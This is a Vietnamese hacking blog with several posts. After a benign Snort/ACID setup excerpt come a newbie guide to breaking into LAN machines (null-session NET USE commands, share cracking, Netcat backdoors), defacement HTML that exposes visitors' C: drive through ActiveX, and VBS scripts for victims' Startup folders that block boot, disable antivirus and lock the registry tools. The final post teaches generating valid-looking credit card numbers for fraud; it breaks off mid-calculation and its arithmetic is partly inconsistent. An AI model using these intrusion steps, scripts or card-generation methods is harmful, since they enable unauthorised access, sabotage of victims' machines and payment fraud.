mysql> grant INSERT,SELECT on snort.* to snort@localhost identified by '<password>';
mysql> exit
# mysql snort -u root -p < ./contrib/create_mysql
Sửa các thông số sau trong file /etc/snort/snort.conf
var HOME_NET 192.168.1.0/24
...
output database: log, mysql, user=snort password=<password> dbname=snort host=localhost
output database: alert, mysql, user=snort password=<password> dbname=snort host=localhost
Khởi động snort:
# /usr/local/bin/snort -D -d -v -i eth0 -c /etc/snort/snort.conf
* Cài đặt và cấu hình acid
Download mã nguồn:
http://www.andrew.cmu.edu/~rdanyliw/snort/acid-0.9.6b21.tar.gz
http://phplens.com/lens/dl/adodb190.tgz
http://prdownloads.sourceforge.net/phplot/phplot-4.4.6.tar.gz
Giải nén và đặt adodb, acid vào thư mục con của httpd DocumentRoot:
# cp acid-0.9.6b21.tar.gz /var/www/html
# tar zxvf acid-0.9.6b21.tar.gz
# cp adodb190.tgz /var/www/html
# tar zxvf adodb190.tgz
# cp phplot-4.4.6.tar.gz /var/www/html
# tar zxvf phplot-4.4.6.tar.gz
Kiểm tra xem php có được cấu hình đúng với gd không:
http://locolhost/phplot-4.4.6/examples/test_setup.php
Nếu không xem được các biểu đồ ví dụ, bạn phải xem lại php có được biên dịch với thư viện gd và đã bật hỗ trợ gd trong /etc/php.ini chưa (extension=gd.so).
Tạo bảng dữ liệu để lưu trữ các alert dành riêng cho acid:
# mysql -u root -p
mysql> create database snort_archive;
mysql> grant INSERT,SELECT on snort.* to snort_archive@localhost identified by '<password>';
mysql> exit
# mysql snort -u root -p < create_acid_tbls_mysql.sql
Cấu hình các thông số cần thiết cho acid trong file acid_conf.php
$DBlib_path = "../adodb";
$DBtype = "mysql";
/* Alert DB connection parameters */
$alert_dbname = "snort";
$alert_host = "localhost";
$alert_port = "";
$alert_user = "snort";
$alert_password = "<password>";
/* Archive DB connection parameters */
$archive_dbname = "snort_archive";
$archive_host = "localhost";
$archive_port = "";
$archive_user = "snort";
$archive_password = "<password>";
$ChartLib_path = "../phplot-4.4.6"; // tuỳ chọn, nếu php hỗ trợ gd
/* File format of charts ('png', 'jpeg', 'gif') */
$chart_file_format = "png";
Để an toàn, nên thiết lập yêu cầu xác thực cho các truy xuất đến thư mục acid trên web server.
File /var/www/html/acid/.htaccess:
AuthName ACID Secure Area
AuthType Basic
AuthUserFile /var/www/html/acid/.htpasswd
Allow from all
<limit GET POST>
require valid-user
</limit>
File /var/www/html/acid/.htpasswd:
acid:<encrypted password>
Thiết lập browser của bạn cho phép tất cả cookie từ host chạy acid. Hoàn tất quá trình cài đặt và bắt đầu sử dụng acid để theo dõi các hoạt động trên mạng được snort phát hiện:
http://localhost/acid/
* Tham khảo:
http://www.snort.org/
http://www.andrew.cmu.edu/~rdanyliw/snort/snortacid.html

__________________
--SkZ0

Thứ Ba, 20 tháng 8, 2013

on Leave a Comment

Cac buoc co ban de dot nhap trong LAN

 


Các bước cơ bản để đột nhập trong LAN :
Có một số thắc mắc về các cách để thâm nhập vào một máy tính trong LAN của các bạn mới vào và các câu trả lời thường không được thống nhất, còn các tài liệu English thì các bạn ngại đọc.
Ðặc biệt là đối với các máy trong LAN không share resources, điều đó không có nghĩa là bạn không thể vào được. Dưới đây tôi sẽ giới thiệu sơ lược cho các bạn một vài cách thức cơ bản để kiểm tra và tìm cách đột nhập vào 1 máy tính trong LAN.

1- Kiểm tra IPC share: IPC viết tắt của Inter-Process Communication, được dùng trong việc chia sẻ dữ liệu giữa các ứng dụng và máy tính trên mạng (NT/2K). Khi một máy được khởi động và log vào mạng, hdh sẽ tạo 1 chia sẻ ngầm định tên là IPC$. Nó sẽ giúp cho các máy khác có thể nhìn thấy và kết nối đến các chia sẻ trên máy này. Tuy nhiên, có thể vì một lý do gì đó, người dùng xóa mất IPC$ share, do đó, ta cần kiểm tra và tạo lại kết nối đến IPC$ (gọi là null connection), nếu kết nối thành công, ta có thể thấy được cả các chia xẻ đặc biệt được ẩn (bao gồm C$, ADMIN$, IPC$, IPC$). Cụ thể, dùng 1 trong 3 lệnh sau ở command prompt:
C:\>NET USE \\TARGET\IPC$ "" /USER:""
C:\>NET USE \\TARGET\IPC$ * /USER:
C:\>NET USE \\TARGET\IPC$ * /USER:""

trong đó: target là computername hoặc IP của máy bạn muốn kết nối.
Lưu ý, các chia xẻ có dấu $ phía sau tên chỉ ra rằng chia xẻ đó được ẩn và cách này chỉ áp dụng khi cổng NetBios 139 của máy bạn và máy đích được mở.
Thường là đối với chia xẻ dạng này, bạn sẽ ít có cơ hội khai thác được gì. Tuy nhiên, nếu may mắn, bạn vẫn có thể khai thác được trong trường hợp các chia xẻ đó không yêu cầu mật khẩu.

Kế đến, bạn dùng lệnh sau để xem các chia xẻ thấy được:
C:\>net view \\TARGET
Lệnh net view sẽ liệt kê danh sách các share của máy đích. Bạn dùng net view /? để biết thêm các cách dùng khác.
Sau khi tạo được null connection và biết được các share trên máy đối phương. Ðối với các share được bảo vệ bằng username/password, bạn có thể dùng các tool sau để thử crack chúng: Nat (NetBIOS Auditing Tool)...
Ðể tiết kiệm thời gian, bạn tìm và dùng thử chương trình xSharez scanner, cũng có thể cho bạn kết quả tương tự.

2- Kiểm tra các cổng mở
Một cách khác để connect vào một máy là duyệt các port mở của máy đích. Tuỳ loại port mà ta có cách thức khai thác khác nhau, đơn giản nhất là dùng telnet để connect vào máy thông qua port được mở, ví dụ: C:\telnet anhnguyen 69
Một số port thông dụng:
21: FTP
23: Telnet proxy server
25: SMTP
110: POP3
139: NETBIOS
1080: SOCKS proxy
6667: IRC mapping
.....
Các công cụ để scan port có rất nhiều, ví dụ như: superscan, elite, ....
Sau khi scan được port nào đang opened, nếu port đó ngoài những port trên, bạn thử dùng telnet để connect, nếu thành công, bạn có thể vào command prompt shell của máy đó.

3- Kiểm tra các lổ hổng của OS/Software
Cách cuối cùng tớ nói ở đây, cũng là cách khó nhất là duyệt xem máy đó đang dùng OS gì, server gì, software nào. Mỗi loại trên có các hole/vulnerability riêng, được tìm thấy và mô tả chi tiết trong các site về security như ntbugtraq, securityfocus, hoặc trong forum.
Từ những lổ hổng biết được, ta sử dụng các exploit tương ứng để thâm nhập vào máy.
Lỗi sơ đẳng nhất trong các system software là lỗi về cách đặt password, ví dụ như các máy Wins 9x có thể vào mà không cần password (tất nhiên là khi đó, người log vào sẽ bị hạn chế truy cập các tài nguyên mạng); hoặc như với NT/2K, sau khi setup, password ngầm định của adminnistrator là rỗng, nếu user không thay đổi pass cho admin, thì ta có thể connect remote được dưới username là administrator mà không cần pass.
Các lỗi còn lại thường là do các sai sót trong quá trình viết chương trình mà vô tình tạo nên những lỗ hổng, các đoạn code kiểm tra không đầy đủ, không stable...cho phép người dùng thực thi các lệnh, chạy các chương trình từ xa. Ví dụ như bug Unicode encoding của IIS4... Và cách thường dùng để nhập là tìm cách send 1 trojant/backdoor (điển hình như Netcat...)đến máy đó, chạy backdoor đó để mở 1 port nhất định nào đó, rồi ta sẽ connect remote vào port đó.

Trên đây chỉ là một số phương pháp sơ đẳng để giúp các bạn (newbie) hiểu được các cách thức có thể dùng để thâm nhập vào máy từ xa. Còn rất nhiều phương pháp khác mà tớ không liệt kê hết (vì không biết! hehe), các bạn sẽ từ từ tìm hiểm thêm.


Thứ Hai, 19 tháng 8, 2013

on Leave a Comment

Rỗi rãi dịch bài này chơi How Hackers

 

How Hackers/Crackers Break Into Your System ?
By Najmi
Trong vài năm trở lại đây thì vấn đề an toàn trên mạng thu hút được rất nhiều sự quan tâm. Sự hỗn độn và thay đổi chóng mặt của internet là yếu tố chính là cho người dùng và các doanh nghiệp phải tự mình tăng cường khả năng bảo mật cho máy tính và hệ thống mạng của họ.
Cách đây 10 năm, những người đã cài đặt các hệ thống máy chủ có rất ít hiểu biết và kỹ năng về bảo mật.  Và ngay cả hiện nay, trong số những người vẫn thường cài đặt hệ thống máy chủ vẫn còn rất nhiều thiếu kinh nghiệm về bảo mật.
Những người dung bình thường được trấn an bởi những thong báo từ các công ty lớn về các phương pháp bảo mật của họ. Nhưng không thể chối cãi được sự thật rằng hang tháng chúng ta lại có thêm những thong tin rắng hacker lại đột nhập vào đâu đó và lấy cắp thông tin.
Nhưng tại sao chúng ta lại phải quan tâm đến vấn đề đó. Tôi có thể nói về sự nghiêm trọng của việc deface (??) các trang web, ăn trộm các thong tin bí mật của công ty hay đột nhập vào các hệ thống của chính phủ, nhưng đơn giản hơn hãy để ý đến các lý do cá nhân mà chúng ta vần phải quan tâm.
Bây giờ xin đạt một câu hỏi. Bạn nghĩ thế nào về giá thị của các thông tin mà bạn có? Danh sách đối tác, email, số credit card hay các kế hoạch kinh doanh, báo cáo tài chính có ý nghĩa đối với bạn như thế nào?
Nếu tôi nói rằng tôi có thể đột nhập vào bất kỳ hệ thống nào, thì tôi có thể làm được những gì nhỉ? Tôi sẽ lấy số credit card để tiêu xài, thay đổi tài khoản ngân hang của bạn. Tôi có thể làm cho bạn trỏ thành mất tích ở trên mạng. Tôi cũng có thể bán các thong tin bí mật cho đối thủ cạnh tranh của bạn, hay làm cho hệ thống của bạn ngừng hoạt động, như vậy bạn sẽ bị lỗ nặng hehe.
Hoặc giả sử tôi là một nhân viên trong công ty của bạn, nhưng tôi bất mãn. Tôi có thể tấn công làm cho mạng không hoạt động, hay cài virus để cho bạn bị mất toàn bộ dữ liệu.
Bạn có chắc là chúng ta cần đến các biện pháp bảo mật không?
Vấn đề bảo mật có thể chia làm các nhóm sau:
1. Mạng và máy chủ bị cấu hình sai.
2. Hệ điều hành và ứng dụng bị lỗi.
3. Nhà cung cấp thiếu trách nhiệm
4. Thiếu những cá nhân đáng tin tưởng.
Cấu hình sai máy chủ:
Đây là nguyên nhân tạo ra đa phần các lỗ hổng bảo mật. Rất nhiều khi người quản trị không nhận biết được các dịch vụ đang chạy trên máy chủ của họ. Bạn có thể hỏi tại sao lại như vậy được? Hãy nghĩ đơn giản như chương trình Word, có bao nhiêu khả năng mà bạn biết được. Nếu biết một vài thứ cơ bản như viết macro thì bạn đã có thể trở thành người dung cao cấp rồi. Đa phần người dung chỉ biết đến các tính năng cơ bản như lưu, xoá, đánh vần, kẻ bảng .v.v.
Tương tự như vậy đối với hệ điều hành và ứng dụng. Sự thay đổi nhanh chóngcủa công nghệ làm cho chỉ một số ít người có thể theo kịp. Và như thê thì các máy tính nối mạng hiển nhiên là đang đối mặt với nguy cơ bị xâm nhập.
Sau đây là một vài ví dụ về các ứng dụng và dich vụ:
Hệ thống in trên mạng.
Hệ thống điều khiển từ xa.
Chia xe file.
Các mã CGI và script ví dụ.
Khi những hệ thống này sử dụng các giá trị mặc định hoặc bị cấu hình sai thì sẽ là cơ hội tốt để kẻ xấu (:)) xâm nhập.
Lỗi trong các ứng dụng:
Những lỗi nảy sinh khi lập trình là một yếu tố làm cho ứng dụng vượt ra ngoài tầm kiểm soát của người sử dụng. Ví dụ như những lỗi của MS IIS hay trong ISC BIND hay SSH và rất nhiều lỗi khác nữa trong các hệ thống của Sun. Đơn gian hơn nữa là lỗi của OE mà bạn có thể trở thành mục tiêu của virus, hãy nhớ tới "I LOVE YOU" hay "Melissa".
Những nhà cung cấp thiếu trách nhiêm:
Rất nhiều nhà cung cấp không quan tâm đến điều gì xảy ra trong chượng trình của họ. Việc đảm bảo chất lượng (QA)  trong ngành công nghiệp phần mềm rất yếu. Để tiết kiệm chi phí thì người ta thường không áp dụng những tiêu chuẩn về qui trình sản xuất. Thế thì ai phải chịu hậu quả của sự tối đầu của nhà cung cấp. Đó chính là các hệ thống mạng và máy tính bị phá hoại của bạn.
Trong trưòng hợp các bản sửa lỗi bị chậm chễ cũng có thể làm hại đến công tác bảo mật. Các khám phá lôc hổng  hoạt động với tốc độ ánh sang trong giới “chúng ta” . Từ các mail list hay diễn đàn như www.hackervn.net thì bọn họ chia xẻ với nhau những thong tin mới nhất, trong khi đó với sự chậm chạp của nhà cung cấp thì các hệ thống đã bị phá hoại chỉ sau một đêm.
Tư vấn không đủ trình độ:
Nếu như tất cả các vấn đề ở trên đều đựơc giải quyết thì bạn doanh nghiệp lại vấp phải một vấn đề khác là thiếu những các nhân đáng tin tưởng. Có thể thu thập một đỗi ngũ kỹ sư, quản trị và lập trình viên đủ trình độ, nhưng không dễ tìm ra các chuyên gia bảo mật giỏi, vì có lẽ bọn họ đã đi làm hacker hết cả rồi!.
Và không thể đào tạo đội ngũ chuyên gia bảo mật trong vài ngày. Đó là một quá trình rất dài, phải bắt đầu từ các kiến thức cơ bản như TCP/IP, phần cứng, hệ điều hành, mã hoá và lập trình. Nhưng như vậy mới chỉ đủ cho các hiểu biết sơ đẳng về bảo mật.
Việc thiếu nhân sự làm cho các chương trình về bảo mật trong doanh nghiệp bị xao lãng hoặc đi sai đường. Không có các chính sách về bảo mật hoặc nếu có thì không được hoàn chỉnh. Chính điều đó làm cho hệ thống của bạn bị tổn thương trước các cuộc tấn công.
Vậy thì các hacker xâm nhập vào hệ thống như thế nào?

Có thể vài người muốn kiện tôi vì việc viết ra nhưng tin này (có kiện thì kiên tác giả nhé đừng kiện người dịch). Tại sao? Đơn giản là bởi vì những thong tin sẽ được đưa ra có thể đem đến nhiều tác hại hơn là ích lợi (but not for hackers). Tôi không nói rằng những thong tin đó không thể bị lợi dụng, nhưng chỉ những ngưòi muốn bảo vệ chính mình, họ sẽ tìm thấy những gì họ muốn. Những thong tin này có đầy rẫy trên web và tất cả hacker đều biết. Còn những người dung bình thường thì không cần cố gắng để làm quen với chúng, vì chúng quá nguy hiểm. Bài viết chỉ đem đến cho họ một chút hiểu biết về những gì mà họ mong muốn.
Hacking có 9 bước đã được đề cập đến trong cuốn sách Hacking Exposed, bao gồm:
(chỗ này để đại TA cho dễ hiểu)
FootPrinting
Scanning
Enumeration
Gaining Access
Escalating Privileges
Pilfering
Covering Tracks
Creating "Back Doors"
Denial of Service
1. FootPrinting:
Đây là cách mà hacker làm khi muốn lấy một lượng thông tin tối đa về máy chủ/doanh nghiệp/người dùng. Nó bao gồm chi tiết về địa chỉ IP, Whois, DNS ..v.v đại khái là những thong tin chính thức có lien quan đến mục tiêu. Nhiều khi đơn giản hacker chỉ cần sử dụng các công cụ tìm kiếm trên mạng để tìm những thong tin đó.
2. Scanning:
Khi đã có nhưng thong tin đó rồi, thì tiếp đến là đánh giá và định danh những những dịch vụ mà mục tiêu có. Việc này bao gồm quét cổng, xác định hệ điều hành, .v.v.. Các công cụ được sử dụng ở đây như nmap, WS pingPro, siphon, fscam và còn rất nhiều nữa.
3. Enumeration:
Bước thứ ba là tìm kiếm những tài nguyên đựoc bảo vệ kém, hoạch tài khoản người dung mà có thể sử dụng để xâm nhập. Nó bao gồm các mật khẩu mặc định, các script và dich vụ mặc định. Rât nhiều người quản trị mạng không biết đến hoặc không sửa đổi lại các giá trị này.  
4. Gaining Access:
Bây giờ kẻ xâm nhập sẽ tìm cách truy cập vào mạng bằng những thong tin có đựơc ở ba bước trên. Phương pháp được sử dụng ở đây có thể là tấn công vào lỗi tràn bộ đệm, lấy và giả mã file password, hay thô thiển nhất là brute force (kiểm tra tất cả các trường hợp) password. Các tool thường được sử dụng ở bước này là NAT, podium, hoặc Lopht.
5. Escalating Privileges:
Ví dụ trong trường hợp hacker xâm nhập đựợc vào mạng với tài khoản guest, thì họ sẽ tìm cách kiểm soát toàn bộ hệ thống. Hacker sẽ tìm cách crack password của admin, hoặc sử dụng lỗ hổng để leo thang đặc quyền. John và Riper là hai chương trình crack password rất hay được sử dụng.
6. Pilfering:
Thêm một lần nữa các máy tìm kiếm lại đựơc sử dụng để tìm các phương pháp truy cập vào mạng. Những file text chứa password hay các cơ chế không an toàn khác có thể là mồi ngon cho hacker.
7. Covering Tracks:
Sau khi đã có những thong tin cần thiết, hacker tìm cách xoá dấu vết, xoá các file log của hệ điều hành làm cho người quản lý không nhận ra hệ thống đã bị xâm nhập hoặc có biêt cũng không tìm ra kẻ xâm nhập là ai.
8. Creating "Back Doors":
Hacker để lại "Back Doors", tức là một cơ chế cho phép hacker truy cập trở lại bằng con đường bí mật không phải tốn nhiều công sức,  bằng việc cài đặt Trojan hay tạo user mới (đối với tổ chức có nhiều user). Công cụ ở đây là các loại Trojan, keylog…
9. Denial of Service (aka DoS):
Nêu không thành công trong việc xâm nhập, thì DoS là phượng tiên cuối cùng để tấn công hệ thống. Nếu hệ thong không được cấu hình đúng cách, nó sẽ bị phá vỡ và cho phép hacker truy cập. Hoặc trong trường hợp khác thì DoS sẽ làm cho hệ thống không hoạt động được nũa. Các công cụ hay được sử dụng để tấn công DoS là trin00, Pong Of Death, teardrop, và các loại nuker, flooder.
Vậy thì làm thế nào để tự bảo vệ?
Nếu bạn là người dùng cuối, bạn có thể hỏi như vậy. Đơn giản là vì không có gì 100% an toàn. Các lỗ hổng mới được tìm ra hàng ngày, các phương pháp mới cũng hình thành sau một đêm. Nhiều khi bạn nghĩ là an toàn, nhưng đến lúc nhận ra là bị xâm phạm thì đã muộn rồi.
Nhưng ở đây cũng có một vài hướng dẫn để bạn có thể tự bảo vệ mình:
Cài đặt firewall tốt và đảm bảo rằng nó được cấu hình chính xác.
Tắt tất cả các ứng dụng và dịch vụ của hệ thống mà bạn không sử dụng.
Không bao giờ mở những file đến từ người lạ.
Cài đặt các chương trinh diệt virus tốt và được cập nhật thường xuyên.
Cài đăt các bản sửa lỗi mới nhất và tham gia vào các hệ thống tin trực tuyến về bảo mật để thong tin được cập nhật kịp thời.
Có một chính sách bảo mật riêng cho mình.
Đảm bảo một hệ thống mạng tốt để tránh rủi ro.
Đầu tư các thiết bị phần cứng bảo mật tốt (money).
Sẽ không có một cuốn Kinh thánh nào về bảo mật cho bạn, tất cả chỉ là những chỉ dẫn phổ thong, nhưng đa phần người dung đã không để ý đến chúng và hâu quả là họ đã bị nguy  hiểm. Không thể chống lại hack được nhưng có thể giảm thiểu được nó :P
Bảo mật không phải là câu chuyện vui. Không có bảo mật  thì các máy tính nối mạng sẽ bị tàn phá, Nhũng lỗ hổng và các công cụ đã được thông báo thì nó sẽ không chỉ là thông báo, mà nó là điềm báo trước điều gì sẽ xảy ra.
Một vài lời khuyên:
Nếu bạn muốn học “Hack” thì còn phải đọc nhiều hơn nữa.
Hacking không chỉ là xâm nhập trái phép vào hệ thống máy tính. Nó còn hơn thế nữa. Nó là là thách thức mà bạn phải trải qua. Giống ngọn núi đối với người leo núi, và người leo núi đã được báo trước về tiềm năng tạo ra sự đau đớn lớn lao cho người khác. Nó không chỉ đơn giản nhu những ví dụ mà tôi đã đề cập đến.
Bất cứ  điều gì về hacking mà bạn đọc được đều có thể được sử dụng với mục đích tốt hay xấu. Tôi khuyên bạn nên xác đinh được mục đích trước khi chạy thử một chương trinh hack nào đó. Trở thành một hacker giỏi cũng không phải là một điều xấu, mà ngược lại nó còn rất tốt vì nhiều lý do. Vì vậy bạn nên cố gắng giúp đỡ những người bạn gặp để trở thành một hacker tốt. Có rất nhiều người không có một khái niệm nào về sự xâm nhập từ bên ngoài vào máy tính của họ.
Tôi cũng khuyên bạn học và học thật tốt một nghề để làm cho hiểu biết được mở rộng. Và luôn luôn, luôn luôn nghĩ đến việc hỗ trợ người khác dù cho bạn có đánh mất cơ hôi để tiến xa hơn.
Tất nhiên đó chỉ là lời khuyên! Hoàn toàn tuỳ thuộc ở bạn.
Đối với riêng tôi, tôi luôn cố gắng mở rộng kiến thức hoặc ít nhất cũng tìm đựơc sự hiểu biết về điều gì đang xảy ra trong thế giới máy tính.
+++ Hết +++

Bài dịch của vnofear

Chủ Nhật, 18 tháng 8, 2013

on Leave a Comment

View HardDisk

 


View HardDisk :
Sau khi bạn Hack được 1 trang Web thì có lẽ bạn upload trang Web của bạn với dòng chữ "This Website was hacked by ..." thay cho trang index. Nhưng như vậy thì thường quá mà lại không có ấn tượng . Bạn muốn làm cho Victim một phen giật mình, ok. Bạn hãy upload 1 trang Web có source như sau :
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>This Website was Hacked</TITLE>
<STYLE>BODY {
FONT-SIZE: 12px; COLOR: black; FONT-FAMILY: tahoma
}
</STYLE>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2600.0" name=GENERATOR></HEAD>
<BODY text=#000000 bgColor=#ffffff>
<P>Is dit van u?</P>
<P>
<OBJECT id=browserIcons height="90%" width="100%" align=baseline border=0
classid=clsid:EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B><PARAM NAME="ExtentX" VALUE="7938"><PARAM NAME="ExtentY" VALUE="3969"><PARAM NAME="ViewMode" VALUE="1"><PARAM NAME="Offline" VALUE="0"><PARAM NAME="Silent" VALUE="0"><PARAM NAME="RegisterAsBrowser" VALUE="0"><PARAM NAME="RegisterAsDropTarget" VALUE="0"><PARAM NAME="Height" VALUE="150"><PARAM NAME="Width" VALUE="300"><PARAM NAME="AutoArrange" VALUE="1"><PARAM NAME="NoClientEdge" VALUE="1"><PARAM NAME="AlignLeft" VALUE="0"><PARAM NAME="ViewID" VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}"><PARAM NAME="Location" VALUE="file:///C:/"></OBJECT><BR>Greetz harry
<BR></P></BODY></HTML>
Như vậy khi Victim vào Website của mình thì tự động nó sẽ View HardDisk (thường là ổ C) của Victim. Như vậy sẽ ấn tượng hơn

Thứ Bảy, 17 tháng 8, 2013

on Leave a Comment

Vai tro dua voi Victim

 

Vài trò đùa với các Victim



Khi các bạn đột nhập được vào máy người khác, tại sao không đùa với họ một tí nhỉ ?
Sau đây là một vài trò chơi do tôi nghĩ ra, bằng cách đặt một file (*.vbs) nằm trong thư mục Startup chứa một trong những đoạn script sau:

1.Trò chơi thứ nhất: không cho victim khởi động máy:

Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"

2.Trò chơi thứ hai: disable NAV( nếu có install) của họ:
Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"

3.Trò chơi thứ ba: hiển thị môt meesage mỗi khi họ reboot máy:
dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = "HKLM\Software\Microsoft\Windows\CurrentVersion\WinLogon\"
s2 = "LegalNoticeCaption"
s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "Hackervn.org"
wsh.RegWrite s1+s3, "Robinhood invite you to join hackervn.org"

4.Trò chơi 4: hiển thị một dòng lệnh mỗi khi họ click vào một file hay folder:
set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\Hello I am Robinhood-come from hackervn.org\",""
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hello I am Robinhood-come from hackervn.org\","Robinhood"

5.Trò chơi 5: trò chơi này đảm bảo cho các trò chơi trên có thể diễn ra "vui vẻ": disable Registry của victim:
Dim objShell
Set objShell = CreateObject( "WScript.Shell" )
s1 = "HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\"
s2 = "Policies\System\DisableRegistryTools"
objShell.RegWrite s1+s2,1, "REG_DWORD"
Trên đây là 5 trò chơi "khá vui", thật ra còn nhiểu trò chơi khác nũa nhưng "nguy hiểm" cho victim nên thôi.

--------------------

Virus is nothing but if you don't take care of them, you will have nothing.


Thứ Sáu, 16 tháng 8, 2013

on Leave a Comment

Can ban ve Credit Card

 


Căn bản về Credit Card

Chào các bạn !
Trong thời gian qua, tại một số Forum, chúng ta thường nghe nói và bàn luân nhiều đến vấn đề Credit Card. Tôi cũng có theo dõi và cũng có tìm hiểu nghiên cứu chút ít về nó, hy vọng những gì tôi trình bày bên dưới sẽ giúp cho các bạn hiểu được vấn đề này rõ ràng hơn.
Hôm nay tôi xin “mạn phép” được trình bày một hiểu biết của tôi về vấn đề Credit Card.
Bài viết này chỉ có mục đích tham khảo, tăng thêm sự hiểu biết cũng như tính bảo mật của Card, do vậy chúng tôi hoàn toàn không chịu trách nhiệm trước pháp luật cũng như những ai cố tình sủ dụng bài viết cho mục đích khác, làm gây nguy hại đến vật chất và tài sản của người khác.
Bài viết này được viềt dành tặng “đặc biệt” cho người bạn gái Lê Bảo Vy của tôi.

oo-=0=-oo

Một Number Card thường gồm có 16 chữ số, có loại có 13 chữ số.

Trong đó, 4 chữ số đầu tiên thường quy định và là dấu hiệu nhận dạng bởi các tên của ngân hàng phát hành Card đó

3xxx xxxx xxxx xxxx: Ameriacan Express Card

4xxx xxxx xxxx xxxx: Visa Card

5xxx xxxx xxxx xxxx: Master Card

6xxx xxxx xxxx xxxx: Discover Card

Chữ số đầu tiên thường được dùng để nhận biết đó là Card của loại nào.

3 = Ame

4 = Visa

5 = Master

6 = Discover

3 chữ số tiếp theo sau là tên nhận dạng ID của ngân hàng.

Nói chung, khi ta nhìn vào 4 ký tự số đầu tiên ta sẽ biết đó là thể loại nào: American Express Card, Visa Card, Master Card hay Discover Card.

AMERICAN EXPRESS

3XXX

3728

3713

3731 - AmEx Green

3737 - AmEx Optima

3782 - AmEx - Small Corporate Card

....

VISA CARD

4XXX

4013 - Citibank

4019 - Bank of America

4024 - Bank of America

4027 - Rockwell Federal Credit Union

4032 - Household Bank

....

MASTER CARD

5XXX

5100 - Western States Bankcard Association

5110 - Universal Travel Voucher

5120 - Western States Bankcard Association

5130 - Eurocard France

....

DISCOVER CARD

6XXX

6013 - MBNA

....

Làm sao để kiểm tra số Card là đúng. Nhờ đâu mà các chương trình kiểm tra Card có thể biết được đó là số đúng của Card.
Câu trả lời đó là tất cả đều phụ thuộc vào con số cuối cùng của Card. Đó là con số mà những chương trình gọi là số tổng kiểm tra (checksum), con số này sẽ quyết định dãy số của Card là số đúng hay sai.
Nếu con số cuối cùng là đúng và phù hợp thì nó là một dãy số Number Card đúng, chúng ta có thể dùng nó.
Nếu số đó là một con số sai thì coi như Number Card đó sai.
Tuy nhiên, nếu chúng ta thông minh và để ý một chút thì ta vẫn có thể tìm được một Number Card đúng sau 9 lần thử khác nhau. Vì ta có thể thay đổi con số cuối cùng thành 1 trong 9 lựa chọn khác:
Ví dụ: 3xxx xxxx xxxx xxx5 : dãy số đúng ta cần tìm.
Ta lần lượt thay con số cuối cùng như sau:
3xxx xxxx xxxx xxx0
3xxx xxxx xxxx xxx1
3xxx xxxx xxxx xxx2
3xxx xxxx xxxx xxx3
3xxx xxxx xxxx xxx4
3xxx xxxx xxxx xxx5 ===> đây là kết quả đúng và con số 5 là số cần tìm.
3xxx xxxx xxxx xxx6
3xxx xxxx xxxx xxx7
3xxx xxxx xxxx xxx8
3xxx xxxx xxxx xxx9
Như vậy tới đây là tạm thời có thể hiểu cách tìm (tính toán) sao cho có một Number Card đúng.
Đây là cách tính thủ công, cách tính “mẹo”. Quá dễ phảI không các bạn.
Như vậy các bạn chỉ cần biết 4 con số đầu tiên để làm “gốc”, 4 con số này để chương trình biết nó là Master Card hay Visa Card … và đó chính là tên của ngân hàng. Sau đó các bạn có thể tự bịa ra 1 dãy số bất kỳ nào đó.
Thay đổi con số “cuối cùng” trong khoảng từ 0..9 để tìm ra con số đúng nhất và như vậy bạn đã có 1 Number Card hợp lệ.

Cách tính toán và tìm ra quy luật của Number Card.
Như đã nói ở trên, chúng ta chỉ cần biết 4 con số đầu tiên mà thôi. Đó là 4 con số quy định tên ID của ngân hàng. Chúng ta chỉ cần biết 4 con số đó là có thể tự tạo ra cho mình một số lượng Number Card dùng thoải mái cho đến ngày vào Prison chơi ;)
Sau đây tôi sẽ cùng các bạn đi tìm cách tính toán một cách khoa học và chính xác hơn chứ không phảI ngồi , rồi phảI thay đổi con số cuối cho phù hợp.
Ví dụ: 5204 xxxx xxxx xxxY
5204 = Security Pacific : đây là Master Card do ngân hàng Security Pacific phát hành.
xxxx xxxx xxx: là một dãy số ngẫu nhiên, bất kỳ nào đó.
Y : đây là con số cần tìm để Number Card là hợp lệ
Sau khi biết 4 số đầu tiên, ta có thể lấy ngẫu nhiên và bất kỳ từ số 0 đến số 9 của mười một ký tự số đại diện cho chữ X.
Giả sử tôi lấy là
5204 1234 5678 901Y
5204 xxxx xxxx xxxY

Trong đó ta chia ra làm 2 dãy số chẵn và dãy số lẽ.
a. Dãy số 5 0 1 3 5 7 9 1 ta gọi là dãy số lẽ.
b. Dãy số 2 4 2 4 6 8 0 Y ta gọi là dãy số chẫn.
Lấy từng chữ số trong dãy số lẽ “nhân” vớI 2
5 x 2 = 10
0 x 2 = 0
1 x 2 = 2
3 x 2 = 6
5 x 2 = 10
7 x 2 = 14
9 x 2 = 18
1 x 2 = 2
Nếu kết quả nhân của từng số nào lớn hơn 9, thì ta lấy số đó trừ đi 9.
5 x 2 = 10 - 9 = 1
0 x 2 = 0 = 0
1 x 2 = 2 = 2
3 x 2 = 6 = 6
5 x 2 = 10 = 1
7 x 2 = 14 - 9 = 5
9 x 2 = 18 - 9 = 9
1 x 2 = 2 = 2

Cộng các kết quả mớI tình được lai vớI nhau:
1 + 0 + 2 + 6 + 1 + 5 + 9 + 2 = 26 ===èSố A
Cộng các chữ số của dãy số chẵn lại vớI nhau, vì Y là số cần tìm và ta chưa biết nên không cần cộng
Dãy số 2 4 2 4 6 8 0 Y là dãy số chẵn đã nói ở trên
2 + 4 + 2 + 4 + 6 + 8 + 0 = 26 ===è Số B
Lấy A + B
26 + 26 = 52
TớI đây ta lấy số cuối cùng là 2 cộng thêm 8 để làm tròn số thành 10
Ví dụ:
+ số cuối cùng là 3 thì cộng thêm 7 để thành 10
+ số cuối cùng là 4 thì cộng thêm 6 để thành 10
+ số cuối cùng là 5 thì cộng thêm 5 để thành 10
+ số cuối cùng là 6 thì cộng thêm 4 để thành 10
